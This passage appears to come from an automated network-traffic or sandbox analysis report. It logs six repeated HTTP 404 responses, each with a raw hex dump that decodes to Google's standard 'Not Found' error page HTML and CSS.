65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
